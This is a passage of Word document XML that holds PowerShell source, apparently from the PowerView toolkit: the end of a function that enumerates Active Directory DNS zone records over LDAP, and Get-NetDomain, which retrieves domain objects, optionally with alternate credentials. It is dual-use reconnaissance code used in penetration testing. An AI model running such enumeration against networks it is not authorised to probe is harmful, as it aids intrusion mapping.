        <w:t xml:space="preserve">        Retrieve all records for all zones in the dev.testlab.local domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA49A1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B9312F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FA0D26F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5B78D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F8427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D7D2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ZoneName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0907D2E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C31F00A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2621F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0B408B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26B7DC0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681CA77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C413F13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E1DA1E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D816D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F04737" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8C30C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="398F9ACC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55324C1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059EE3BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9345B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BE55917" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48978D43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DNSSearcher.filter="(objectClass=dnsNode)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79132F3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70080036" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($DNSSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD1BB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results = $DNSSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D1E4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220AD04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A5716" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B984C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDE6305" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties | Add-Member NoteProperty 'ZoneName' $ZoneName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27896E44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E57EA10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # convert the record and extract the properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB4CF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                if ($Properties.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458481D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # TODO: handle multiple nested records properly?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0774D990" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB2A5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15248BA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E27B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5815503F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B45B66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56234214" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Record) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AAD3EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Record.psobject.properties | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191230F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Properties | Add-Member NoteProperty $_.Name $_.Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FAC8DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF8E55B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983C5CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F4818F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF2D795" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4541C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9302E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning "ERROR: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA3A3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265914CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F9978" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F75BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC50278" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DNSSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC8684" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C15663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251BE51D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A315883" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="121D5E4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetDomain {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB7791B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ADBF14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C881391" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B638F72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns a given domain object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582E639" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69C7026E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B51B1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48DE099E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain name to query for, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923C353" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C090139" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080B8C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="253D98AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47167A97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469BB9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="274F37D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D5F90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72E7DCD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomain -Domain testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441039E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D899733" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A6248" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C194D6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; "testlab.local" | Get-NetDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC56AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7155B290" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB03359" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25AED30C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3349F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66999F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="542024C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FD316" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C1E94D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2027FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAAF83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E1BFA93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0268A5E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B17A38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA6E04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="074B7EB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648F2EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C034D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Using alternate credentials for Get-NetDomain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67378A65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58C53455" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20759372" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if no domain is supplied, extract the logon domain from the PSCredential passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A64BD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain = $Credential.GetNetworkCredential().Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB83F43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Extracted domain '$Domain' from -Credential"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465FC41B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F326AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FF07A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain, $Credential.UserName, $Credential.GetNetworkCredential().Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5559372F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA6EF1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51306B6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49961568" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC00456" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A730AA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "The specified domain does '$Domain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C26A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02136575" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27E0FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF3F8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    elseif($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65D573" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA4C5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D102602" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F0A98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D964A54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE3B94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C30660C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7A690" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314DB1BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA867D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A393B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565D42E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89AB3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B751E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
